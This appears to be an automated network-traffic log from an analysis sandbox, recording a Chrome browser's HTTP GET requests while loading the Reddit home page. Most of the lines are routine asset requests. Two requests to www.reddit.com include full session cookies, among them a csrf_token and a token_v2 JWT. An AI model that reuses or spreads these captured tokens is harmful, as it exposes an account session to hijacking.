Source: global trafficHTTP traffic detected: GET /shreddit/qr-code-persistent-button-upsell-client-css-60879cea.css HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/header-large-client-css-eee101e8.css HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/header-client-css-583e4e9f.css HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/hui-grid-client-css-b37067be.css HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /trump-just-attacked-the-constitution-and-violated-his-oath-v0-r33i8783cawe1.png?width=640&crop=smart&auto=webp&s=83db3e894f2bb00c923f9b2ae6f62482581130c3 HTTP/1.1Host: preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/google-one-tap-client-js-83d9ed1e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/experiences-client-js-fb05eba9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/feed-post-client-js-5df0a42f.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/feed-ad-client-js-b90fbf7b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/chat-channel-feed-element-client-js-646e3acb.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh13/styles/communityIcon_pldiwqvsyns91.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=e9043964d8308fece087e4f1d3a28c9434a3df10 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2cneq/styles/communityIcon_fy84mdgh75201.jpg?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=472bd1c805e4b619700ab09f74e694a5cd850341 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh3s/styles/communityIcon_3hssuqq28v4e1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=cd3b8e30512676345b9da6977662bbcea1b69211 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2rfsw/styles/communityIcon_143o7qme59f71.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=824332071c5e9922d6d4ca5859fa89a20873f9ce HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /us-imposes-tariffs-up-to-3-521-on-southeast-asia-solar-v0-yfEQnukeFZZjzWGUB-QnxwYtVhfOGG6ne0-09Smf18U.jpg?width=320&crop=smart&auto=webp&s=d3b66a09afcac7f01a0cafb6db4ee0546e65eb8d HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /harvard-university-sues-trump-administration-v0-CnN8ZfKcOn4wDwHWh1APYslDeCre3dW2lslBX2v2lPk.jpg?width=320&crop=smart&auto=webp&s=7ffccf74a52099eec5a9b04e930399271e4cd6cf HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /new-oscars-rule-if-you-dont-see-all-the-nominated-films-you-v0-cmKiQRTdAG60tRvxu0TW4Zn5IR8liBQippjgcfwwgPc.jpg?width=320&crop=smart&auto=webp&s=b91a6267ef92527b98a4fb7cc6ea3e8e2e1e7735 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /highlight-jalen-brunson-collides-with-ausar-thompson-and-v0-6CP-MBBLWl2aW-hy3UMydAhWSxamxScgB-3PkNsHTSQ.jpg?width=320&crop=smart&format=pjpg&auto=webp&s=9ae9843edd4b98eca028edb66bd587c978871393 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /X3dq7BwWSNeUHhYVAwg9EWZnzdW0rDaEwG8X76Th8PI.jpg?auto=webp&s=41609c39ac55f81573d212eaf4cf408bb74a3170 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2vbgl/styles/communityIcon_47xlywkzsy7b1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=7c8a91844f3ee66935dade4a9c794b21077261a9 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh22/styles/communityIcon_18jg89hnk9ae1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=fd029310c85c6c9e1af990ff8efac4e36fbdda01 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lh3XYdayDnfF474A_Ro9fBWUViOibSr4BoTpx0ETyvg.png HTTP/1.1Host: b.thumbs.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/dsa-transparency-modal-provider-client-js-d42de5ac.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /trump-just-attacked-the-constitution-and-violated-his-oath-v0-r33i8783cawe1.png?width=640&crop=smart&auto=webp&s=83db3e894f2bb00c923f9b2ae6f62482581130c3 HTTP/1.1Host: preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/update-recaptcha?k=cG9wdWxhcnxpbml0aWFsfGE4ZDU3MDUzLWJkZjctNGFiNS05MmQxLWEyMGE0ZGFjY2E3NA HTTP/1.1Host: www.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/?rdt=54831Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; session_tracker=brgcmaqpjfinlpaqdm.0.1745344514860.Z0FBQUFBQm9COWdDMHl2Tmx1SnJNRFBBeDBpLVVQOWhXQ0xjUzQ4YkZjd2RROEh1TzdndU9PTzAwWUlMbERZUkRuN2dMeDg5Tl9hdk44enJ1cDBxTVY0R2ZUanZoeUk2dHVwdEhBcVBrd01oa21GdVVSVkVoeWZWbVdNa0ZCRnlKMENHdEZfUmxMd08; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2
Source: global trafficHTTP traffic detected: GET /sw.js HTTP/1.1Host: www.reddit.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.reddit.com/?rdt=54831User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/media-lightbox-client-js-976ccbbe.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/left-nav-recent-section HTTP/1.1Host: www.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/vnd.reddit.partial+html, text/html;q=0.9sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/?rdt=54831Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; session_tracker=brgcmaqpjfinlpaqdm.0.1745344514860.Z0FBQUFBQm9COWdDMHl2Tmx1SnJNRFBBeDBpLVVQOWhXQ0xjUzQ4YkZjd2RROEh1TzdndU9PTzAwWUlMbERZUkRuN2dMeDg5Tl9hdk44enJ1cDBxTVY0R2ZUanZoeUk2dHVwdEhBcVBrd01oa21GdVVSVkVoeWZWbVdNa0ZCRnlKMENHdEZfUmxMd08; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/compact-post-community-recommendations-client-js-8648402c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
